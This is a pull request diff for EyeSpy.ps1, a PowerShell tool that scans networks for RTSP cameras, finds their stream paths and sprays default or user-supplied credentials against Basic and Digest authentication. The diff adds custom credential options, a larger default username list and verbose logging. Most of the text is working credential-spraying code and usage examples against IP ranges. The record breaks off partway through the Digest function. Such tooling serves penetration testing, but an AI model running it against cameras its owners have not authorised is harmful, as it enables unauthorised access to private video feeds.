### PR TITLE
Dev

### DIFF
--- a/EyeSpy.ps1
+++ b/EyeSpy.ps1
@@ -671,8 +671,9 @@ function GenerateCreds {
         [string]$CustomCreds
     )
     
-    $UserList = @("Admin", "admin", "admin1", "administrator", "Administrator",
-                "aiphone", "root", "Root", "service", "supervisor", "ubnt"
+    $UserList = @("admin", "root", "", "666666","888888", "Admin","admin1", 
+                  "administrator", "Administrator", "aiphone", "Dinion",
+                  "none", "Root", "service", "supervisor", "ubnt"
                 )
 
     $PassList = @("", "0000", "00000", "1111", "111111", "1111111",

--- a/EyeSpy.ps1
+++ b/EyeSpy.ps1
@@ -1202,7 +1202,7 @@ function Test-DigestRTSPAuth {
                 break  # Empty line means end of headers
             }
             # If we hit another header (not WWW-Authenticate), we might be done with WWW-Authenticate
-            elseif ($response -match "^[A-Za-z-]+:" -and !$response -match "(?i)^WWW-Authenticate:") {
+            elseif (($response -match "^[A-Za-z-]+:") -and ($response -notmatch "(?i)^WWW-Authenticate:")) {
                 if ($inWWWAuthenticate -and $wwwAuthenticateHeader) {
                     $headerComplete = $true
                 }

--- a/EyeSpy.ps1
+++ b/EyeSpy.ps1
@@ -837,7 +837,8 @@ function GenerateCreds {
             $validCount = 0
             foreach ($line in $credLines) {
                 $line = $line.Trim()
-                if ($line -and $line -match '^(.+):(.*)$') {
+                # Split on the first ':' so passwords may contain colons (e.g., admin:pass:word)
+                if ($line -and $line -match '^([^:]+):(.*)$') {
                     $fileUser = $matches[1]
                     $filePass = $matches[2]
                     [void]$authStringList.Add([Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes("$fileUser`:$filePass")))

--- a/EyeSpy.ps1
+++ b/EyeSpy.ps1
@@ -14,6 +14,12 @@ function EyeSpy {
         [Parameter(Mandatory = $False, ParameterSetName = 'Default')]
         [ValidateRange(10, 2000)]
         [int]$Timeout = 200,
+        [Parameter(Mandatory = $False)]
+        [String]$Username,
+        [Parameter(Mandatory = $False)]
+        [String]$Password,
+        [Parameter(Mandatory = $False)]
+        [String]$Creds,
         [Parameter(Mandatory = $False, ParameterSetName = 'Default')]
         [Switch]$Help
 
@@ -21,7 +27,7 @@ function EyeSpy {
 
     if ($Help) {
 
-        $HelpOutput = @("
+        $HelpOutput = @'
 ========================================================================================================
                
 ========================================================================================================
@@ -54,6 +60,10 @@ Optional Parameters:
 |     Parameter     |   Value    |                  Description                                        |
 +===================+============+=====================================================================+
 | -Timeout          | (10-2000)  | (Default: 200) Set Global Receive Timeout Value.                    |
+| -Username         | 'username' | Custom username with default password list.                         |
+| -Password         | 'password' | Custom password with default username list.                         |
+| -Creds            | 'FilePath' | Path to credentials file (username:password per line).              |
+| -Verbose          |    N/A     | Show detailed RTSP request/response packets for troubleshooting.    |
 | -Help             |    N/A     | Shows this Help.                                                    |
 +======================================================================================================+
 
@@ -74,13 +84,28 @@ Example Usage:
 # Performs all of the above automatically across a single IP or Range
   Eyespy -Auto 192.168.0.1/24
 
+# Use custom username with all default passwords
+  EyeSpy -AuthAttack 192.168.0.100:554 -Username 'admin'
+
+# Use custom password with all default usernames
+  EyeSpy -Auto 192.168.0.1/24 -Password 'secret123'
+
+# Use a single custom credential pair
+  EyeSpy -AuthAttack 192.168.0.100:554 -Username 'admin' -Password 'secret'
+
+# Load credentials from a file (one username:password per line)
+  EyeSpy -Auto 192.168.0.1/24 -Creds 'C:\path\to\creds.txt'
+
+# Enable verbose output to see full RTSP packets (for troubleshooting)
+  EyeSpy -AuthAttack 192.168.0.100:554 -Username 'admin' -Password 'secret' -Verbose
+
 # Shows this help message
   Eyespy -Help
 
 ========================================================================================================
-")
+'@
 
-        $HelpOutput | Write-Output
+        Write-Output $HelpOutput
         return
 
     }
@@ -107,7 +132,7 @@ Example Usage:
         Write-Host "You must Use either -Search, -NoAuth, -AuthAttack or -Auto"
     
         Write-Host "[!] " -ForegroundColor "Red" -NoNewline
-        Write-Host "Run ""EyeSpy -Help"" for command line usage"
+        Write-Host 'Run "EyeSpy -Help" for command line usage'
         Write-Host
     
         return
@@ -227,6 +252,117 @@ function GenerateDigest {
 
 }
 
+function Invoke-RtspRequest {
+    <#
+    .SYNOPSIS
+    Sends an RTSP request and returns parsed response with status line and headers.
+    
+    .DESCRIPTION
+    Centralizes RTSP request/response handling with proper timeout control,
+    bounded reads, and consistent resource disposal.
+    #>
+    [CmdletBinding()]
+    param (
+        [Parameter(Mandatory)]
+        [string]$IP,
+        
+        [Parameter(Mandatory)]
+        [int]$Port,
+        
+        [Parameter(Mandatory)]
+        [string]$Method,
+        
+        [Parameter(Mandatory)]
+        [string]$Uri,
+        
+        [Parameter()]
+        [string[]]$Headers = @(),
+        
+        [Parameter()]
+        [int]$ReceiveTimeoutMs = 200,
+        
+        [Parameter()]
+        [int]$MaxLinesToRead = 50
+    )
+    
+    $CRLF = [char]13 + [char]10
+    $tcpClient = $null
+    $stream = $null
+    $writer = $null
+    $reader = $null
+    
+    try {
+        # Build the request
+        $requestLines = @("$Method $Uri RTSP/1.0")
+        $requestLines += $Headers
+        $requestLines += ""  # Empty line to end headers
+        $request = ($requestLines -join $CRLF) + $CRLF
+        
+        # Connect and send
+        $tcpClient = New-Object System.Net.Sockets.TcpClient
+        $tcpClient.ReceiveTimeout = $ReceiveTimeoutMs
+        $tcpClient.Connect($IP, $Port)
+        
+        $stream = $tcpClient.GetStream()
+        $writer = New-Object System.IO.StreamWriter($stream)
+        $writer.Write($request)
+        $writer.Flush()
+        
+        # Read response with bounded line count
+        $reader = New-Object System.IO.StreamReader($stream)
+        $statusLine = $null
+        $responseHeaders = @()
+        $linesRead = 0
+        
+        # Read status line
+        if (!$reader.EndOfStream -and $linesRead -lt $MaxLinesToRead) {
+            $statusLine = $reader.ReadLine()
+            $linesRead++
+        }
+        
+        # Read headers until blank line or limit
+        while (!$reader.EndOfStream -and $linesRead -lt $MaxLinesToRead) {
+            $line = $reader.ReadLine()
+            $linesRead++
+            
+            if ([string]::IsNullOrWhiteSpace($line)) {
+                break  # End of headers
+            }
+            
+            $responseHeaders += $line
+        }
+        
+        return [PSCustomObject]@{
+            StatusLine = $statusLine
+            Headers    = $responseHeaders
+            Success    = $statusLine -match 'RTSP/1\.0 (\d{3})'
+            StatusCode = if ($statusLine -match 'RTSP/1\.0 (\d{3})') { [int]$matches[1] } else { 0 }
+            IP         = $IP
+            Port       = $Port
+            Uri        = $Uri
+        }
+        
+    }
+    catch {
+        return [PSCustomObject]@{
+            StatusLine = $null
+            Headers    = @()
+            Success    = $false
+            StatusCode = 0
+            IP         = $IP
+            Port       = $Port
+            Uri        = $Uri
+            Error      = $_.Exception.Message
+        }
+    }
+    finally {
+        if ($null -ne $reader) { $reader.Dispose() }
+        if ($null -ne $writer) { $writer.Dispose() }
+        if ($null -ne $stream) { $stream.Dispose() }
+        if ($null -ne $tcpClient) { $tcpClient.Dispose() }
+    }
+}
+
 function Get-OpenRTSPPorts {
     [CmdletBinding()]
     param (
@@ -236,7 +372,6 @@ function Get-OpenRTSPPorts {
 
     Write-Host "Checking for IPs with Open RTSP Ports:`r`n"
     $openPorts = [System.Collections.Concurrent.ConcurrentBag[PSCustomObject]]::new()
-    $lock = New-Object System.Object
 
     # Create the runspace pool
     $runspacePool = [runspacefactory]::CreateRunspacePool(1, [System.Environment]::ProcessorCount)
@@ -244,7 +379,7 @@ function Get-OpenRTSPPorts {
 
     $runspaces = foreach ($ip in $IPAddress) {
         $runspace = [powershell]::Create().AddScript({
-            param ($ip, $ports, $openPorts, $lock)
+			param ($ip, $ports, $openPorts)
 
             foreach ($port in $ports) {
                 try {
@@ -263,21 +398,15 @@ function Get-OpenRTSPPorts {
                                 Status    = "Open"
                             })
 
-                            lock ($lock) {
-                                # No need for additional logic here
-                            }
                         }
                     }
                 } catch {
                     # Do nothing
                 } finally {
-                    if ($tcpClient.Connected) {
-                        $tcpClient.Close()
-                        $tcpClient.Dispose()
-                    }
+					if ($null -ne $tcpClient) { $tcpClient.Close(); $tcpClient.Dispose() }
                 }
             }
-        }).AddArgument($ip).AddArgument((554, 8554, 5554)).AddArgument($openPorts).AddArgument($lock)
+		}).AddArgument($ip).AddArgument((554, 8554, 5554)).AddArgument($openPorts)
 
         $runspace.RunspacePool = $runspacePool
         [PSCustomObject]@{ Pipe = $runspace; Status = $runspace.BeginInvoke() }
@@ -357,75 +486,69 @@ function Get-AuthType {
             if ($authDetected) { break }  # Exit inner loop if auth type found
 
             $authtyperesult = @()
-            $CRLF = [char]13 + [char]10
+            
+            # Use the centralized RTSP helper
+            $response = Invoke-RtspRequest -IP $ip -Port $port -Method "DESCRIBE" `
+                -Uri "rtsp://$ip`:$port/$testPath" -Headers @("CSeq: 1") `
+                -ReceiveTimeoutMs $Timeout
 
-            $request = "DESCRIBE rtsp://$ip`:$port/$testPath RTSP/1.0$CRLF" +
-                       "CSeq: 1$CRLF$CRLF"
-
-            try {
-                $tcpClient = New-Object System.Net.Sockets.TcpClient
-                $tcpClient.ReceiveTimeout = $Timeout
-                $tcpClient.Connect($ip, $port)
-
-                $stream = $tcpClient.GetStream()
-                $writer = New-Object System.IO.StreamWriter($stream)
-                $writer.Write($request)
-                $writer.Flush()
-
-                $reader = New-Object System.IO.StreamReader($stream)
-                $statusLine = $reader.ReadLine()
-
-                while (!$reader.EndOfStream) {
-                    $response = $reader.ReadLine()
-
-                    if ($response -match "(?i)\bdigest\b") {
-                        Write-Host -ForegroundColor Yellow -NoNewline "Found Digest`: "
-                        Write-Host "$ip`:$port"
-                        $authtyperesult += [PSCustomObject]@{
+            if ($response.Success) {
+                # Extract Server header for vendor hints
+                $serverHeader = $response.Headers | Where-Object { $_ -match "(?i)^Server:" } | Select-Object -First 1
+                $serverValue = if ($serverHeader -match "(?i)^Server:\s*(.+)$") { $matches[1].Trim() } else { "Unknown" }
+                
+                # Check headers for authentication type
+                $authHeader = $response.Headers | Where-Object { $_ -match "(?i)^WWW-Authenticate:" } | Select-Object -First 1
+                
+                if ($authHeader -match "(?i)\bdigest\b") {
+                    Write-Host -ForegroundColor Yellow -NoNewline "Found Digest`: "
+                    Write-Host "$ip`:$port (Server: $serverValue)"
+                    $authtyperesult += [PSCustomObject]@{
+                        IPAddress = $ip
+                        Port      = $port
+                        Status    = "Open"
+                        authType  = "Digest"
+                        Server    = $serverValue
+                    }
+                    $authDetected = $true
+                } 
+                elseif ($authHeader -match "(?i)\bbasic\b") {
+                    Write-Host -ForegroundColor Yellow -NoNewline "Found Basic`: "
+                    Write-Host "$ip`:$port (Server: $serverValue)"
+                    $authtyperesult += [PSCustomObject]@{
+                        IPAddress = $ip
+                        Port      = $port
+                        Status    = "Open"
+                        authType  = "Basic"
+                        Server    = $serverValue
+                    }
+                    $authDetected = $true
+                }
+                elseif ($response.StatusCode -eq 404) {
+                    $unknownAuth = $true
+                }
+                elseif ($response.StatusCode -eq 200) {
+                    # No auth required
+                    if ($authtyperesult.Count -eq 0) {
+                        Write-Host -ForegroundColor Yellow -NoNewline "Found NoAuth`: "
+                        Write-Host "$ip`:$port (Server: $serverValue)"
+                        $foundAuth += [PSCustomObject]@{
                             IPAddress = $ip
                             Port      = $port
                             Status    = "Open"
-                            authType  = "Digest"
+                            authType  = "none"
+                            Server    = $serverValue
                         }
                         $authDetected = $true
-                        break  # Exit inner loop if auth type found
-                    } elseif ($response -match "(?i)\bbasic\b") {
-                        Write-Host -ForegroundColor Yellow -NoNewline "Found Basic`: "
-                        Write-Host "$ip`:$port"
-                        $authtyperesult += [PSCustomObject]@{
-                            IPAddress = $ip
-                            Port      = $port
-                            Status    = "Open"
-                            authType  = "Basic"
-                        }
-                        $authDetected = $true
-                        break  # Exit inner loop if auth type found
-                    } elseif ($response -match "(404 Not Found)") {
-                        $unknownAuth = $true
-                        #Write-Host -ForegroundColor Yellow -NoNewline "Auth Type Not Found, Testing Next Path For`: "
-                        #Write-Host "$ip`:$port"
                     }
                 }
-            } catch {
-                #Write-Warning "An error occurred: $_"
-            } finally {
-                if ($tcpClient.Connected) {
-                    $tcpClient.Dispose()
-                }
+            }
+            else {
+                # Connection failed or error
+                $unknownAuth = $true
             }
 
-            if ($authtyperesult.Count -eq 0 -and !$unknownAuth) {
-                Write-Host -ForegroundColor Yellow -NoNewline "Found NoAuth`: "
-                Write-Host "$ip`:$port"
-                $foundAuth += [PSCustomObject]@{
-                    IPAddress = $ip
-                    Port      = $port
-                    Status    = "Open"
-                    authType  = "none"
-                }
-            } elseif ($unknownAuth -and ($authtyperesult.Count -eq 0)) {
-                # Do nothing, continue to the next path
-            } else {
+            if ($authtyperesult.Count -gt 0) {
                 $foundAuth += $authtyperesult
             }
         }
@@ -438,6 +561,7 @@ function Get-AuthType {
                 Port      = $port
                 Status    = "Open"
                 authType  = "Unknown"
+                Server    = "Unknown"
             }
         }
     }
@@ -489,42 +613,30 @@ function Get-ValidRTSPPaths {
     
     Write-Host "`r`nChecking for valid RTSP Paths:`r`n"
 
-    foreach ($openPort in $OpenPorts) {
-            $ip = $openPort.IPAddress
-            $port = $openPort.Port
-            $authType = $openPort.authType
-            $validPathFound = $false
-
-
+    # Group by IP:Port to handle multiple ports per IP
+    $portsByIPPort = $OpenPorts | Group-Object -Property { "$($_.IPAddress):$($_.Port)" }
+    
+    foreach ($portGroup in $portsByIPPort) {
+        $openPort = $portGroup.Group[0]  # Get first item (all have same IP:Port)
+        $ip = $openPort.IPAddress
+        $port = $openPort.Port
+        $authType = $openPort.authType
 
         foreach ($path in $Paths) {
-            if ($validPathFound) { continue }  # Skip if a valid path is already found
+            # Use the centralized RTSP helper
+            $response = Invoke-RtspRequest -IP $ip -Port $port -Method "DESCRIBE" `
+                -Uri "rtsp://$ip`:$port/$path" -Headers @("CSeq: 1") `
+                -ReceiveTimeoutMs $Timeout
 
-            $CRLF = [char]13 + [char]10
-            $request = "DESCRIBE rtsp://$ip`:$port/$path RTSP/1.0$CRLF" +
-                       "CSeq: 1$CRLF$CRLF"
-
-            try {
-                $tcpClient = New-Object System.Net.Sockets.TcpClient
-                $tcpClient.ReceiveTimeout = $Timeout
-                $tcpClient.Connect($ip, $port)
-
-                $stream = $tcpClient.GetStream()
-                $writer = New-Object System.IO.StreamWriter($stream)
-                $writer.Write($request)
-                $writer.Flush()
-
-                $reader = New-Object System.IO.StreamReader($stream)
-                $statusLine = $reader.ReadLine()
-
-                if ($statusLine -match 'RTSP/1.0 200 OK') {
+            if ($response.Success) {
+                if ($response.StatusCode -eq 200) {
                     Write-Host -NoNewline -ForegroundColor Green "[+]"
                     Write-Host -NoNewline " No Auth Required`: "
                     Write-Host -ForegroundColor Green "$ip`:$port/$path"
-                    $validPathFound = $true
-    
+                    # Continue scanning to find ALL auth-required paths as well
                 }
-                elseif ($statusLine -match 'RTSP/1.0 401 Unauthorized' -or $statusLine -match 'RTSP/1.0 403 Forbidden') {
+                elseif ($response.StatusCode -eq 401 -or $response.StatusCode -eq 403) {
+                    # Collect ALL auth-required paths (don't stop after first)
                     $authRequiredPaths += [PSCustomObject]@{
                         IPAddress = $ip
                         Port      = $port
@@ -533,13 +645,9 @@ function Get-ValidRTSPPaths {
                     }
                 }
             }
-            catch {
-                Write-Warning "An error occurred: $_"
-            }
-            finally {
-                if ($tcpClient.Connected) {
-                    $tcpClient.Dispose()
-                }
+            else {
+                # Silently continue on connection errors
+                # Optionally log: Write-Warning "Error testing path $path on $ip`:$port - $($response.Error)"
             }
         }
     }
@@ -551,6 +659,18 @@ function Get-ValidRTSPPaths {
 }
 
 function GenerateCreds {
+    [CmdletBinding()]
+    param (
+        [Parameter(Mandatory = $false)]
+        [string]$CustomUsername,
+        
+        [Parameter(Mandatory = $false)]
+        [string]$CustomPassword,
+        
+        [Parameter(Mandatory = $false)]
+        [string]$CustomCreds
+    )
+    
     $UserList = @("Admin", "admin", "admin1", "administrator", "Administrator",
                 "aiphone", "root", "Root", "service", "supervisor", "ubnt"
                 )
@@ -568,15 +688,63 @@ function GenerateCreds {
                 "user", "wbox", "wbox123", "Y5eIMz3C"
                 )
 
-    $authString = @()
+    # Use a List to avoid quadratic array concatenation costs
+    $authStringList = New-Object System.Collections.Generic.List[string]
 
-    foreach ($user in $UserList){
+    # Handle -Creds: Path to a file with username:password entries (one per line)
+    if ($CustomCreds) {
+        if (Test-Path -Path $CustomCreds -PathType Leaf) {
+            $credLines = Get-Content -Path $CustomCreds -ErrorAction SilentlyContinue
+            $validCount = 0
+            foreach ($line in $credLines) {
+                $line = $line.Trim()
+                if ($line -and $line -match '^(.+):(.*)$') {
+                    $fileUser = $matches[1]
+                    $filePass = $matches[2]
+                    [void]$authStringList.Add([Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes("$fileUser`:$filePass")))
+                    $validCount++
+                }
+            }
+            if ($validCount -gt 0) {
+                Write-Host -ForegroundColor Cyan "[*] Loaded $validCount credential(s) from file: $CustomCreds"
+            }
+            else {
+                Write-Warning "No valid credentials found in file: $CustomCreds. Expected format: username:password (one per line)."
+            }
+        }
+        else {
+            Write-Warning "Credentials file not found: $CustomCreds"
+        }
+    }
+    # Handle -Username only: Custom username + hardcoded password list
+    elseif ($CustomUsername -and -not $CustomPassword) {
+        Write-Host -ForegroundColor Cyan "[*] Using custom username '$CustomUsername' with default password list"
         foreach ($pass in $PassList) {
-            $authString += [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes("$user`:$pass")) 
-        }              
+            [void]$authStringList.Add([Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes("$CustomUsername`:$pass")))
+        }
+    }
+    # Handle -Password only: Hardcoded username list + custom password
+    elseif ($CustomPassword -and -not $CustomUsername) {
+        Write-Host -ForegroundColor Cyan "[*] Using default username list with custom password '$CustomPassword'"
+        foreach ($user in $UserList) {
+            [void]$authStringList.Add([Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes("$user`:$CustomPassword")))
+        }
+    }
+    # Handle -Username AND -Password: Single custom credential only
+    elseif ($CustomUsername -and $CustomPassword) {
+        Write-Host -ForegroundColor Cyan "[*] Using custom credentials: $CustomUsername`:$CustomPassword"
+        [void]$authStringList.Add([Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes("$CustomUsername`:$CustomPassword")))
+    }
+    # No custom credentials: Use full default list
+    else {
+        foreach ($user in $UserList){
+            foreach ($pass in $PassList) {
+                [void]$authStringList.Add([Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes("$user`:$pass")))
+            }
+        }
     }
 
-    return $authString
+    return $authStringList.ToArray()
 }
 
 function Get-ValidRTSPCredential {
@@ -589,18 +757,40 @@ function Get-ValidRTSPCredential {
         [Parameter(Mandatory)]
         [string]$Path,
         [Parameter(Mandatory)]
-        [string[]]$authType
+        [string]$authType,
+        [Parameter(Mandatory = $false)]
+        [string]$CustomUsername,
+        [Parameter(Mandatory = $false)]
+        [string]$CustomPassword,
+        [Parameter(Mandatory = $false)]
+        [string]$CustomCreds
     )
 
-    $credentials = GenerateCreds
+    $credentials = GenerateCreds -CustomUsername $CustomUsername -CustomPassword $CustomPassword -CustomCreds $CustomCreds
+    
+    # Validate credentials were generated
+    if ($null -eq $credentials -or $credentials.Count -eq 0) {
+        Write-Warning "No credentials generated for $IP`:$Port/$Path"
+        return [PSCustomObject]@{
+            Credential = $null
+            CredentialFound = $false
+        }
+    }
+    
+    Write-Verbose "========================================================="
+    Write-Verbose "Starting credential spray for: $IP`:$Port/$Path"
+    Write-Verbose "Auth Type: $authType"
+    Write-Verbose "Total credentials to test: $($credentials.Count)"
+    Write-Verbose "========================================================="
+    
     $parentActivity = "Checking`: $IP`:$Port/$Path"
     $parentStatus = "Starting"
     $parentId = Get-Random
 
     $credentialStep = 0
-    $totalCredentials = $Credentials.Count
+    $totalCredentials = $credentials.Count
 
-    foreach ($cred in $Credentials) {
+    foreach ($cred in $credentials) {
         $credentialStep++
         $childActivity = "Trying credential $($credentialStep)/$totalCredentials"
         $childStatus = "Working"
@@ -608,6 +798,10 @@ function Get-ValidRTSPCredential {
 
         $parentProgress = [math]::Floor(($credentialStep / $totalCredentials) * 100)
         Write-Progress -Id $parentId -Activity $parentActivity -Status $parentStatus -PercentComplete $parentProgress -CurrentOperation $childActivity -SecondsRemaining (-1)
+
+        # Decode credential for verbose output
+        $decodedCred = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($cred))
+        Write-Verbose "[$credentialStep/$totalCredentials] Testing: $decodedCred"
 
         if ($authType -eq "Digest"){
             # Use Digest Auth Mode
@@ -624,6 +818,9 @@ function Get-ValidRTSPCredential {
         if ($validCred) {
             Write-Progress -Id $parentId -Activity $parentActivity -Status "Success" -PercentComplete 100 -Completed
             Write-Progress -Id $childId -Activity $childActivity -Status "Success" -PercentComplete 100 -Completed -ParentId $parentId
+            Write-Verbose "========================================================="
+            Write-Verbose "CREDENTIALS FOUND for $IP`:$Port/$Path"
+            Write-Verbose "========================================================="
 
             return [PSCustomObject]@{
                 Credential = $validCred
@@ -632,10 +829,15 @@ function Get-ValidRTSPCredential {
         } else {
             $childStatus = "Failed"
             Write-Progress -Id $childId -Activity $childActivity -Status $childStatus -PercentComplete 100 -Completed -ParentId $parentId
+            Write-Verbose "? Credential failed: $decodedCred"
         }
     }
 
     Write-Progress -Id $parentId -Activity $parentActivity -Status "Failed" -PercentComplete 100 -Completed
+    Write-Verbose "========================================================="
+    Write-Verbose "? No valid credentials found for $IP`:$Port/$Path"
+    Write-Verbose "Tested $totalCredentials credentials"
+    Write-Verbose "========================================================="
 
     return [PSCustomObject]@{
         Credential = $null
@@ -659,37 +861,72 @@ function Test-BasicRTSPAuth {
     $CRLF = [char]13 + [char]10
 
     $request = "DESCRIBE rtsp://$IP`:$Port/$Path RTSP/1.0$CRLF" +
-               "CSeq: 2$CRLF" +
+               "CSeq: 1$CRLF" +
                "Authorization: Basic $Credential$CRLF$CRLF"
+    
+    Write-Verbose "--- Basic Auth Request ---"
+    Write-Verbose $request
+    Write-Verbose "--- End Request ---"
 
-    try {
-        $tcpClient = New-Object System.Net.Sockets.TcpClient
-        $tcpClient.ReceiveTimeout = $Timeout
-        $tcpClient.Connect($IP, $Port)
+	$tcpClient = $null
+	$stream = $null
+	$writer = $null
+	$reader = $null
 
-        $stream = $tcpClient.GetStream()
-        $writer = New-Object System.IO.StreamWriter($stream)
-        $writer.Write($request)
-        $writer.Flush()
+	try {
+		$tcpClient = New-Object System.Net.Sockets.TcpClient
+		$tcpClient.ReceiveTimeout = $Timeout
+		$tcpClient.Connect($IP, $Port)
 
-        $reader = New-Object System.IO.StreamReader($stream)
-        $statusLine = $reader.ReadLine()
+		$stream = $tcpClient.GetStream()
+		$writer = New-Object System.IO.StreamWriter($stream)
+		$writer.Write($request)
+		$writer.Flush()
 
-        if ($statusLine -match 'RTSP/1.0 200 OK') {
-            $reader.Dispose()
-            $writer.Dispose()
-            $stream.Dispose()
-            $tcpClient.Dispose()
-
-            $credentials = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($Credential))
-            return $credentials
-        }
-        elseif ($statusLine -match 'RTSP/1.0 401 Unauthorized' -or $statusLine -match 'RTSP/1.0 403 Forbidden') {
-            $reader.Dispose()
-            $writer.Dispose()
-            $stream.Dispose()
-            $tcpClient.Dispose()    
-        }
+		$reader = New-Object System.IO.StreamReader($stream)
+		
+		# Read response with bounded line count to avoid infinite loops
+		$maxLinesToRead = 20
+		$linesRead = 0
+		$statusLine = $null
+		$responseLines = @()
+		
+		while (!$reader.EndOfStream -and $linesRead -lt $maxLinesToRead) {
+			$line = $reader.ReadLine()
+			$linesRead++
+			$responseLines += $line
+			
+			# Capture status line
+			if ($null -eq $statusLine -and $line -match '^RTSP/1\.0') {
+				$statusLine = $line
+			}
+			
+			# Check for success (200 OK)
+			if ($line -match 'RTSP/1\.0\s+200') {
+				Write-Verbose "--- Basic Auth Response (SUCCESS) ---"
+				Write-Verbose ($responseLines -join "`r`n")
+				Write-Verbose "--- End Response ---"
+				$credentials = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($Credential))
+				Write-Verbose "Valid credentials found: $credentials"
+				return $credentials
+			}
+			
+			# If we found status line and it's not 200, we can break early for 401/403
+			if ($statusLine -and ($statusLine -match 'RTSP/1\.0\s+(401|403)')) {
+				Write-Verbose "--- Basic Auth Response (FAILED) ---"
+				Write-Verbose ($responseLines -join "`r`n")
+				Write-Verbose "--- End Response ---"
+				break
+			}
+			
+			# Empty line indicates end of headers
+			if ([string]::IsNullOrWhiteSpace($line) -and $statusLine) {
+				Write-Verbose "--- Basic Auth Response ---"
+				Write-Verbose ($responseLines -join "`r`n")
+				Write-Verbose "--- End Response ---"
+				break
+			}
+		}
     }
     catch [System.Net.Sockets.SocketException] {
         Write-Warning "Connection refused by $IP`:$Port Waiting 30s before continuing."
@@ -700,9 +937,10 @@ function Test-BasicRTSPAuth {
        # Write-Warning "An error occurred: $_"
     }
     finally {
-        if ($tcpClient.Connected) {
-            $tcpClient.Dispose()
-        }
+		if ($null -ne $reader) { $reader.Dispose() }
+		if ($null -ne $writer) { $writer.Dispose() }
+		if ($null -ne $stream) { $stream.Dispose() }
+		if ($null -ne $tcpClient) { $tcpClient.Dispose() }
     }
 
     return $null
@@ -728,65 +966,155 @@ function Test-DigestRTSPAuth {
     
     $CRLF = [char]13 + [char]10
     
-    try {
-        [int]$CSeq = 1
+	$tcpClient = $null
+	$stream = $null
+	$writer = $null
+	$reader = $null
 
+	try {
         $request = "DESCRIBE rtsp://$IP`:$Port/$Path RTSP/1.0$CRLF" +
-                   "CSeq: $CSeq$CRLF$CRLF"
+                   "CSeq: 1$CRLF$CRLF"
 
         $uri = "rtsp://$IP`:$Port/$Path"
-        $tcpClient = New-Object System.Net.Sockets.TcpClient
-        $tcpClient.ReceiveTimeout = 4  # Set a specifically low timeout due to issue with reading 200 response.
-        $tcpClient.Connect($IP, $Port)
+        
+        Write-Verbose "--- Digest Auth Initial Request ---"
+        Write-Verbose $request
+        Write-Verbose "--- End Request ---"
+        
+		$tcpClient = New-Object System.Net.Sockets.TcpClient
+		$tcpClient.ReceiveTimeout = 200  # 200ms timeout - fast enough for testing thousands of creds
+		$tcpClient.Connect($IP, $Port)
 
-        $stream = $tcpClient.GetStream()
-        $writer = New-Object System.IO.StreamWriter($stream)
-        $writer.Write($request)
-        $writer.Flush()
+		$stream = $tcpClient.GetStream()
+		$stream.ReadTimeout = 200  # Set stream timeout as well
+		$writer = New-Object System.IO.StreamWriter($stream, [System.Text.Encoding]::ASCII)
+		$writer.Write($request)
+		$writer.Flush()
 
-        $reader = New-Object System.IO.StreamReader($stream)
+		$reader = New-Object System.IO.StreamReader($stream, [System.Text.Encoding]::ASCII)
         
         $digestProcessed = $false
+        $challengeResponse = @()
+        $wwwAuthenticateHeader = $null
+        $inWWWAuthenticate = $false
+        $headerComplete = $false
 
-        while (!$reader.EndOfStream -and !$digestProcessed) {
+        # Read response lines to find and collect the complete WWW-Authenticate header
+        $maxLinesToRead = 15  # Reduced for faster processing when testing thousands of creds
+        $linesRead = 0
+        
+        # First, read all response lines to get the complete WWW-Authenticate header
+        while (!$reader.EndOfStream -and $linesRead -lt $maxLinesToRead -and !$headerComplete) {
             $response = $reader.ReadLine()
+            $challengeResponse += $response
+            $linesRead++
 
-            # Check for Digest Authentication
-            if ($response -match "(?i)\bDigest\b") {
-                # Pluck out the Realm and Nonce for creating a response
-                $realm = if ($response -match 'realm="([^"]+)"') { $matches[1] } else { $null }
-                $nonce = if ($response -match 'nonce="([^"]+)"') { $matches[1] } else { $null }
+            # Check if this line starts WWW-Authenticate header
+            if ($response -match "(?i)^WWW-Authenticate:\s*(.+)") {
+                $inWWWAuthenticate = $true
+                $wwwAuthenticateHeader = $matches[1]
+            }
+            # Check if this is a continuation line (starts with space or tab)
+            elseif ($inWWWAuthenticate -and $response -match "^\s+(.+)") {
+                $wwwAuthenticateHeader += " " + $matches[1]
+            }
+            # If we hit an empty line, we're done with headers - process WWW-Authenticate if we have it
+            elseif ([string]::IsNullOrWhiteSpace($response)) {
+                if ($inWWWAuthenticate -and $wwwAuthenticateHeader) {
+                    $headerComplete = $true
+                }
+                break  # Empty line means end of headers
+            }
+            # If we hit another header (not WWW-Authenticate), we might be done with WWW-Authenticate
+            elseif ($response -match "^[A-Za-z-]+:" -and !$response -match "(?i)^WWW-Authenticate:") {
+                if ($inWWWAuthenticate -and $wwwAuthenticateHeader) {
+                    $headerComplete = $true
+                }
+            }
+        }
+        
+        # Now process the complete WWW-Authenticate header if we have one
+        if ($headerComplete -and $wwwAuthenticateHeader -and $wwwAuthenticateHeader -match "(?i)\bDigest\b" -and !$digestProcessed) {
+            Write-Verbose "--- Digest Auth Challenge Response ---"
+            Write-Verbose ($challengeResponse -join "`r`n")
+            Write-Verbose "--- End Response ---"
+            Write-Verbose "Complete WWW-Authenticate header: $wwwAuthenticateHeader"
+            
+            # Extract Realm and Nonce from the complete header
+            $realmPattern = 'realm="([^"]+)"'
+            $noncePattern = 'nonce="([^"]+)"'
+            $realm = if ($wwwAuthenticateHeader -match $realmPattern) { $matches[1] } else { $null }
+            $nonce = if ($wwwAuthenticateHeader -match $noncePattern) { $matches[1] } else { $null }
+            
+            Write-Verbose "Extracted - Realm: $realm, Nonce: $nonce"
+            
+            # Validate we have both realm and nonce before proceeding
+            if ($realm -and $nonce) {
                 # Create the response
                 $DigestResponse =  GenerateDigest -username $username -password $password -realm $realm -uri $uri -nonce $nonce
-                # Up the Cseq number
-                $CSeq ++
-
+                Write-Verbose "Generated Digest Response: $DigestResponse"
+                
                 # Construct the second request
-                $request2 = "DESCRIBE rtsp://$IP`:$Port/$Path RTSP/1.0$CRLF" +
-                            "CSeq: $CSeq$CRLF" +
